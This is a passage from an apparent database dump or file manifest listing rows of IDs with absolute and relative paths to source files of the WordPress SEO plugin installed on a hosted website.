(1635, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/front-end/indexing-controls.php', 'wp-content/plugins/wordpress-seo/src/integrations/front-end/indexing-controls.php'),
(1636, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/front-end/open-graph-oembed.php', 'wp-content/plugins/wordpress-seo/src/integrations/front-end/open-graph-oembed.php'),
(1637, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/front-end/redirects.php', 'wp-content/plugins/wordpress-seo/src/integrations/front-end/redirects.php'),
(1638, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/front-end/robots-txt-integration.php', 'wp-content/plugins/wordpress-seo/src/integrations/front-end/robots-txt-integration.php'),
(1639, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/front-end/rss-footer-embed.php', 'wp-content/plugins/wordpress-seo/src/integrations/front-end/rss-footer-embed.php'),
(1640, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/front-end/schema-accessibility-feature.php', 'wp-content/plugins/wordpress-seo/src/integrations/front-end/schema-accessibility-feature.php'),
(1641, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/front-end/wp-robots-integration.php', 'wp-content/plugins/wordpress-seo/src/integrations/front-end/wp-robots-integration.php'),
(1642, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/front-end-integration.php', 'wp-content/plugins/wordpress-seo/src/integrations/front-end-integration.php'),
(1643, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/integration-interface.php', 'wp-content/plugins/wordpress-seo/src/integrations/integration-interface.php'),
(1644, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/primary-category.php', 'wp-content/plugins/wordpress-seo/src/integrations/primary-category.php'),
(1645, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/settings-integration.php', 'wp-content/plugins/wordpress-seo/src/integrations/settings-integration.php'),
(1646, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/support-integration.php', 'wp-content/plugins/wordpress-seo/src/integrations/support-integration.php'),
(1647, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/third-party/amp.php', 'wp-content/plugins/wordpress-seo/src/integrations/third-party/amp.php'),
(1648, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/third-party/bbpress.php', 'wp-content/plugins/wordpress-seo/src/integrations/third-party/bbpress.php'),
(1649, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/third-party/elementor.php', 'wp-content/plugins/wordpress-seo/src/integrations/third-party/elementor.php'),
(1650, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/third-party/exclude-elementor-post-types.php', 'wp-content/plugins/wordpress-seo/src/integrations/third-party/exclude-elementor-post-types.php'),
(1651, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/third-party/exclude-woocommerce-post-types.php', 'wp-content/plugins/wordpress-seo/src/integrations/third-party/exclude-woocommerce-post-types.php'),
(1652, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/third-party/jetpack.php', 'wp-content/plugins/wordpress-seo/src/integrations/third-party/jetpack.php'),
(1653, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/third-party/w3-total-cache.php', 'wp-content/plugins/wordpress-seo/src/integrations/third-party/w3-total-cache.php'),
(1654, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/third-party/web-stories-post-edit.php', 'wp-content/plugins/wordpress-seo/src/integrations/third-party/web-stories-post-edit.php'),
(1655, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/third-party/web-stories.php', 'wp-content/plugins/wordpress-seo/src/integrations/third-party/web-stories.php'),
(1656, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/third-party/wincher-publish.php', 'wp-content/plugins/wordpress-seo/src/integrations/third-party/wincher-publish.php'),
(1657, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/third-party/woocommerce-permalinks.php', 'wp-content/plugins/wordpress-seo/src/integrations/third-party/woocommerce-permalinks.php'),
(1658, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/third-party/woocommerce-post-edit.php', 'wp-content/plugins/wordpress-seo/src/integrations/third-party/woocommerce-post-edit.php'),
(1659, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/third-party/woocommerce.php', 'wp-content/plugins/wordpress-seo/src/integrations/third-party/woocommerce.php'),
(1660, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/third-party/wordproof.php', 'wp-content/plugins/wordpress-seo/src/integrations/third-party/wordproof.php'),
(1661, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/third-party/wpml-wpseo-notification.php', 'wp-content/plugins/wordpress-seo/src/integrations/third-party/wpml-wpseo-notification.php'),
(1662, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/third-party/wpml.php', 'wp-content/plugins/wordpress-seo/src/integrations/third-party/wpml.php'),
(1663, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/uninstall-integration.php', 'wp-content/plugins/wordpress-seo/src/integrations/uninstall-integration.php'),
(1664, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/watchers/addon-update-watcher.php', 'wp-content/plugins/wordpress-seo/src/integrations/watchers/addon-update-watcher.php'),
(1665, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/watchers/auto-update-watcher.php', 'wp-content/plugins/wordpress-seo/src/integrations/watchers/auto-update-watcher.php'),
(1666, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/watchers/indexable-ancestor-watcher.php', 'wp-content/plugins/wordpress-seo/src/integrations/watchers/indexable-ancestor-watcher.php'),
(1667, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/watchers/indexable-attachment-watcher.php', 'wp-content/plugins/wordpress-seo/src/integrations/watchers/indexable-attachment-watcher.php'),
(1668, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/watchers/indexable-author-archive-watcher.php', 'wp-content/plugins/wordpress-seo/src/integrations/watchers/indexable-author-archive-watcher.php'),
(1669, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/watchers/indexable-author-watcher.php', 'wp-content/plugins/wordpress-seo/src/integrations/watchers/indexable-author-watcher.php'),
(1670, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/watchers/indexable-category-permalink-watcher.php', 'wp-content/plugins/wordpress-seo/src/integrations/watchers/indexable-category-permalink-watcher.php'),
(1671, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/watchers/indexable-date-archive-watcher.php', 'wp-content/plugins/wordpress-seo/src/integrations/watchers/indexable-date-archive-watcher.php'),
(1672, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/watchers/indexable-home-page-watcher.php', 'wp-content/plugins/wordpress-seo/src/integrations/watchers/indexable-home-page-watcher.php'),
(1673, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/watchers/indexable-homeurl-watcher.php', 'wp-content/plugins/wordpress-seo/src/integrations/watchers/indexable-homeurl-watcher.php'),
(1674, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/watchers/indexable-permalink-watcher.php', 'wp-content/plugins/wordpress-seo/src/integrations/watchers/indexable-permalink-watcher.php'),
(1675, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/watchers/indexable-post-meta-watcher.php', 'wp-content/plugins/wordpress-seo/src/integrations/watchers/indexable-post-meta-watcher.php'),
(1676, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/watchers/indexable-post-type-archive-watcher.php', 'wp-content/plugins/wordpress-seo/src/integrations/watchers/indexable-post-type-archive-watcher.php'),
(1677, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/watchers/indexable-post-type-change-watcher.php', 'wp-content/plugins/wordpress-seo/src/integrations/watchers/indexable-post-type-change-watcher.php'),
(1678, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/watchers/indexable-post-watcher.php', 'wp-content/plugins/wordpress-seo/src/integrations/watchers/indexable-post-watcher.php'),
(1679, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/watchers/indexable-static-home-page-watcher.php', 'wp-content/plugins/wordpress-seo/src/integrations/watchers/indexable-static-home-page-watcher.php'),
(1680, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/watchers/indexable-system-page-watcher.php', 'wp-content/plugins/wordpress-seo/src/integrations/watchers/indexable-system-page-watcher.php'),
(1681, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/watchers/indexable-taxonomy-change-watcher.php', 'wp-content/plugins/wordpress-seo/src/integrations/watchers/indexable-taxonomy-change-watcher.php'),
(1682, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/watchers/indexable-term-watcher.php', 'wp-content/plugins/wordpress-seo/src/integrations/watchers/indexable-term-watcher.php'),
(1683, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/watchers/option-titles-watcher.php', 'wp-content/plugins/wordpress-seo/src/integrations/watchers/option-titles-watcher.php'),
(1684, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/watchers/option-wpseo-watcher.php', 'wp-content/plugins/wordpress-seo/src/integrations/watchers/option-wpseo-watcher.php'),
(1685, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/watchers/primary-category-quick-edit-watcher.php', 'wp-content/plugins/wordpress-seo/src/integrations/watchers/primary-category-quick-edit-watcher.php'),
(1686, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/watchers/primary-term-watcher.php', 'wp-content/plugins/wordpress-seo/src/integrations/watchers/primary-term-watcher.php'),
(1687, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/watchers/search-engines-discouraged-watcher.php', 'wp-content/plugins/wordpress-seo/src/integrations/watchers/search-engines-discouraged-watcher.php'),
(1688, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/watchers/woocommerce-beta-editor-watcher.php', 'wp-content/plugins/wordpress-seo/src/integrations/watchers/woocommerce-beta-editor-watcher.php'),
(1689, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/xmlrpc.php', 'wp-content/plugins/wordpress-seo/src/integrations/xmlrpc.php'),
(1690, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/introductions/application/ai-generate-titles-and-descriptions-introduction-upsell.php', 'wp-content/plugins/wordpress-seo/src/introductions/application/ai-generate-titles-and-descriptions-introduction-upsell.php'),
(1691, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/introductions/application/current-page-trait.php', 'wp-content/plugins/wordpress-seo/src/introductions/application/current-page-trait.php'),
(1692, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/introductions/application/introductions-collector.php', 'wp-content/plugins/wordpress-seo/src/introductions/application/introductions-collector.php'),
(1693, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/introductions/application/user-allowed-trait.php', 'wp-content/plugins/wordpress-seo/src/introductions/application/user-allowed-trait.php'),
(1694, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/introductions/application/version-trait.php', 'wp-content/plugins/wordpress-seo/src/introductions/application/version-trait.php'),
(1695, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/introductions/domain/introduction-interface.php', 'wp-content/plugins/wordpress-seo/src/introductions/domain/introduction-interface.php'),
(1696, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/introductions/domain/introduction-item.php', 'wp-content/plugins/wordpress-seo/src/introductions/domain/introduction-item.php'),
(1697, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/introductions/domain/introductions-bucket.php', 'wp-content/plugins/wordpress-seo/src/introductions/domain/introductions-bucket.php'),
(1698, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/introductions/domain/invalid-user-id-exception.php', 'wp-content/plugins/wordpress-seo/src/introductions/domain/invalid-user-id-exception.php'),
(1699, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/introductions/infrastructure/introductions-seen-repository.php', 'wp-content/plugins/wordpress-seo/src/introductions/infrastructure/introductions-seen-repository.php'),
(1700, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/introductions/infrastructure/wistia-embed-permission-repository.php', 'wp-content/plugins/wordpress-seo/src/introductions/infrastructure/wistia-embed-permission-repository.php'),
(1701, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/introductions/readme.md', 'wp-content/plugins/wordpress-seo/src/introductions/readme.md'),
(1702, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/introductions/user-interface/introductions-integration.php', 'wp-content/plugins/wordpress-seo/src/introductions/user-interface/introductions-integration.php'),
(1703, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/introductions/user-interface/introductions-seen-route.php', 'wp-content/plugins/wordpress-seo/src/introductions/user-interface/introductions-seen-route.php'),
(1704, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/introductions/user-interface/wistia-embed-permission-route.php', 'wp-content/plugins/wordpress-seo/src/introductions/user-interface/wistia-embed-permission-route.php'),
(1705, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/loadable-interface.php', 'wp-content/plugins/wordpress-seo/src/loadable-interface.php'),
(1706, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/loader.php', 'wp-content/plugins/wordpress-seo/src/loader.php'),
(1707, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/loggers/logger.php', 'wp-content/plugins/wordpress-seo/src/loggers/logger.php'),
(1708, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/main.php', 'wp-content/plugins/wordpress-seo/src/main.php'),
(1709, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/memoizers/meta-tags-context-memoizer.php', 'wp-content/plugins/wordpress-seo/src/memoizers/meta-tags-context-memoizer.php'),
(1710, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/memoizers/presentation-memoizer.php', 'wp-content/plugins/wordpress-seo/src/memoizers/presentation-memoizer.php'),
(1711, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/models/indexable-extension.php', 'wp-content/plugins/wordpress-seo/src/models/indexable-extension.php'),
(1712, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/models/indexable-hierarchy.php', 'wp-content/plugins/wordpress-seo/src/models/indexable-hierarchy.php'),
(1713, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/models/indexable.php', 'wp-content/plugins/wordpress-seo/src/models/indexable.php'),
(1714, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/models/primary-term.php', 'wp-content/plugins/wordpress-seo/src/models/primary-term.php'),
(1715, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/models/seo-links.php', 'wp-content/plugins/wordpress-seo/src/models/seo-links.php'),
(1716, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/models/seo-meta.php', 'wp-content/plugins/wordpress-seo/src/models/seo-meta.php'),
(1717, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/presentations/abstract-presentation.php', 'wp-content/plugins/wordpress-seo/src/presentations/abstract-presentation.php'),
(1718, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/presentations/archive-adjacent-trait.php', 'wp-content/plugins/wordpress-seo/src/presentations/archive-adjacent-trait.php'),
(1719, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/presentations/indexable-author-archive-presentation.php', 'wp-content/plugins/wordpress-seo/src/presentations/indexable-author-archive-presentation.php'),
(1720, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/presentations/indexable-date-archive-presentation.php', 'wp-content/plugins/wordpress-seo/src/presentations/indexable-date-archive-presentation.php'),
(1721, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/presentations/indexable-error-page-presentation.php', 'wp-content/plugins/wordpress-seo/src/presentations/indexable-error-page-presentation.php'),
(1722, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/presentations/indexable-home-page-presentation.php', 'wp-content/plugins/wordpress-seo/src/presentations/indexable-home-page-presentation.php'),
(1723, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/presentations/indexable-post-type-archive-presentation.php', 'wp-content/plugins/wordpress-seo/src/presentations/indexable-post-type-archive-presentation.php'),
(1724, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/presentations/indexable-post-type-presentation.php', 'wp-content/plugins/wordpress-seo/src/presentations/indexable-post-type-presentation.php'),
(1725, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/presentations/indexable-presentation.php', 'wp-content/plugins/wordpress-seo/src/presentations/indexable-presentation.php'),
(1726, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/presentations/indexable-search-result-page-presentation.php', 'wp-content/plugins/wordpress-seo/src/presentations/indexable-search-result-page-presentation.php'),
(1727, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/presentations/indexable-static-home-page-presentation.php', 'wp-content/plugins/wordpress-seo/src/presentations/indexable-static-home-page-presentation.php'),
(1728, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/presentations/indexable-static-posts-page-presentation.php', 'wp-content/plugins/wordpress-seo/src/presentations/indexable-static-posts-page-presentation.php'),
(1729, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/presentations/indexable-term-archive-presentation.php', 'wp-content/plugins/wordpress-seo/src/presentations/indexable-term-archive-presentation.php'),
(1730, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/presenters/abstract-indexable-presenter.php', 'wp-content/plugins/wordpress-seo/src/presenters/abstract-indexable-presenter.php'),
(1731, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/presenters/abstract-indexable-tag-presenter.php', 'wp-content/plugins/wordpress-seo/src/presenters/abstract-indexable-tag-presenter.php'),
(1732, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/presenters/abstract-presenter.php', 'wp-content/plugins/wordpress-seo/src/presenters/abstract-presenter.php'),
(1733, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/presenters/admin/alert-presenter.php', 'wp-content/plugins/wordpress-seo/src/presenters/admin/alert-presenter.php'),
(1734, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/presenters/admin/badge-presenter.php', 'wp-content/plugins/wordpress-seo/src/presenters/admin/badge-presenter.php'),
(1735, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/presenters/admin/beta-badge-presenter.php', 'wp-content/plugins/wordpress-seo/src/presenters/admin/beta-badge-presenter.php'),
(1736, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/presenters/admin/help-link-presenter.php', 'wp-content/plugins/wordpress-seo/src/presenters/admin/help-link-presenter.php'),
(1737, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/presenters/admin/indexing-error-presenter.php', 'wp-content/plugins/wordpress-seo/src/presenters/admin/indexing-error-presenter.php'),
(1738, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/presenters/admin/indexing-failed-notification-presenter.php', 'wp-content/plugins/wordpress-seo/src/presenters/admin/indexing-failed-notification-presenter.php'),
(1739, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/presenters/admin/indexing-list-item-presenter.php', 'wp-content/plugins/wordpress-seo/src/presenters/admin/indexing-list-item-presenter.php'),
(1740, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/presenters/admin/indexing-notification-presenter.php', 'wp-content/plugins/wordpress-seo/src/presenters/admin/indexing-notification-presenter.php'),
(1741, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/presenters/admin/light-switch-presenter.php', 'wp-content/plugins/wordpress-seo/src/presenters/admin/light-switch-presenter.php'),
(1742, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/presenters/admin/meta-fields-presenter.php', 'wp-content/plugins/wordpress-seo/src/presenters/admin/meta-fields-presenter.php'),
(1743, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/presenters/admin/migration-error-presenter.php', 'wp-content/plugins/wordpress-seo/src/presenters/admin/migration-error-presenter.php'),
(1744, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/presenters/admin/notice-presenter.php', 'wp-content/plugins/wordpress-seo/src/presenters/admin/notice-presenter.php'),
(1745, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/presenters/admin/premium-badge-presenter.php', 'wp-content/plugins/wordpress-seo/src/presenters/admin/premium-badge-presenter.php'),
(1746, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/presenters/admin/search-engines-discouraged-presenter.php', 'wp-content/plugins/wordpress-seo/src/presenters/admin/search-engines-discouraged-presenter.php'),
(1747, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/presenters/admin/sidebar-presenter.php', 'wp-content/plugins/wordpress-seo/src/presenters/admin/sidebar-presenter.php'),
(1748, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/presenters/admin/woocommerce-beta-editor-presenter.php', 'wp-content/plugins/wordpress-seo/src/presenters/admin/woocommerce-beta-editor-presenter.php'),
(1749, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/presenters/breadcrumbs-presenter.php', 'wp-content/plugins/wordpress-seo/src/presenters/breadcrumbs-presenter.php'),
(1750, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/presenters/canonical-presenter.php', 'wp-content/plugins/wordpress-seo/src/presenters/canonical-presenter.php'),
(1751, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/presenters/debug/marker-close-presenter.php', 'wp-content/plugins/wordpress-seo/src/presenters/debug/marker-close-presenter.php'),
(1752, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/presenters/debug/marker-open-presenter.php', 'wp-content/plugins/wordpress-seo/src/presenters/debug/marker-open-presenter.php'),
(1753, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/presenters/meta-author-presenter.php', 'wp-content/plugins/wordpress-seo/src/presenters/meta-author-presenter.php'),
(1754, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/presenters/meta-description-presenter.php', 'wp-content/plugins/wordpress-seo/src/presenters/meta-description-presenter.php'),
(1755, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/presenters/open-graph/article-author-presenter.php', 'wp-content/plugins/wordpress-seo/src/presenters/open-graph/article-author-presenter.php'),
(1756, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/presenters/open-graph/article-modified-time-presenter.php', 'wp-content/plugins/wordpress-seo/src/presenters/open-graph/article-modified-time-presenter.php'),
(1757, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/presenters/open-graph/article-published-time-presenter.php', 'wp-content/plugins/wordpress-seo/src/presenters/open-graph/article-published-time-presenter.php'),
(1758, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/presenters/open-graph/article-publisher-presenter.php', 'wp-content/plugins/wordpress-seo/src/presenters/open-graph/article-publisher-presenter.php'),
(1759, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/presenters/open-graph/description-presenter.php', 'wp-content/plugins/wordpress-seo/src/presenters/open-graph/description-presenter.php'),
(1760, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/presenters/open-graph/image-presenter.php', 'wp-content/plugins/wordpress-seo/src/presenters/open-graph/image-presenter.php'),
(1761, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/presenters/open-graph/locale-presenter.php', 'wp-content/plugins/wordpress-seo/src/presenters/open-graph/locale-presenter.php'),
(1762, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/presenters/open-graph/site-name-presenter.php', 'wp-content/plugins/wordpress-seo/src/presenters/open-graph/site-name-presenter.php'),
(1763, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/presenters/open-graph/title-presenter.php', 'wp-content/plugins/wordpress-seo/src/presenters/open-graph/title-presenter.php'),
(1764, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/presenters/open-graph/type-presenter.php', 'wp-content/plugins/wordpress-seo/src/presenters/open-graph/type-presenter.php'),
(1765, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/presenters/open-graph/url-presenter.php', 'wp-content/plugins/wordpress-seo/src/presenters/open-graph/url-presenter.php'),
(1766, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/presenters/rel-next-presenter.php', 'wp-content/plugins/wordpress-seo/src/presenters/rel-next-presenter.php'),
(1767, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/presenters/rel-prev-presenter.php', 'wp-content/plugins/wordpress-seo/src/presenters/rel-prev-presenter.php'),
(1768, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/presenters/robots-presenter.php', 'wp-content/plugins/wordpress-seo/src/presenters/robots-presenter.php'),
(1769, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/presenters/robots-txt-presenter.php', 'wp-content/plugins/wordpress-seo/src/presenters/robots-txt-presenter.php'),
(1770, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/presenters/schema-presenter.php', 'wp-content/plugins/wordpress-seo/src/presenters/schema-presenter.php'),
(1771, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/presenters/score-icon-presenter.php', 'wp-content/plugins/wordpress-seo/src/presenters/score-icon-presenter.php'),
(1772, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/presenters/slack/enhanced-data-presenter.php', 'wp-content/plugins/wordpress-seo/src/presenters/slack/enhanced-data-presenter.php'),
(1773, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/presenters/title-presenter.php', 'wp-content/plugins/wordpress-seo/src/presenters/title-presenter.php'),
(1774, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/presenters/twitter/card-presenter.php', 'wp-content/plugins/wordpress-seo/src/presenters/twitter/card-presenter.php'),
(1775, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/presenters/twitter/creator-presenter.php', 'wp-content/plugins/wordpress-seo/src/presenters/twitter/creator-presenter.php'),
(1776, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/presenters/twitter/description-presenter.php', 'wp-content/plugins/wordpress-seo/src/presenters/twitter/description-presenter.php'),
(1777, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/presenters/twitter/image-presenter.php', 'wp-content/plugins/wordpress-seo/src/presenters/twitter/image-presenter.php'),
(1778, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/presenters/twitter/site-presenter.php', 'wp-content/plugins/wordpress-seo/src/presenters/twitter/site-presenter.php'),
(1779, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/presenters/twitter/title-presenter.php', 'wp-content/plugins/wordpress-seo/src/presenters/twitter/title-presenter.php'),
(1780, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/presenters/url-list-presenter.php', 'wp-content/plugins/wordpress-seo/src/presenters/url-list-presenter.php'),
(1781, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/presenters/webmaster/baidu-presenter.php', 'wp-content/plugins/wordpress-seo/src/presenters/webmaster/baidu-presenter.php'),
